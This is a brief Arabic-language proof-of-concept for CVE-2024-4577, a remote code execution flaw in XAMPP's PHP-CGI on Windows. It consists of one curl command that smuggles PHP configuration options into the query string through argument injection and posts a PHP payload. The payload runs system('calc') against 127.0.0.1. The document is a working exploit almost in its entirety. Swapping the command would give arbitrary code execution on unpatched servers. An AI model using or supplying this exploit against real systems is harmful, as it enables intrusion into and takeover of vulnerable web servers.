
استغلال إثبات المفهوم لـ CVE-2024-4577 يستهدف XAMPP PHP-CGI مع تنفيذ تعليمات برمجية عن بُعد عبر حقن الوسائط.
curl -v -d "<?php system('calc'); ?>" http://127.0.0.1/php-cgi/php-cgi.exe/?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0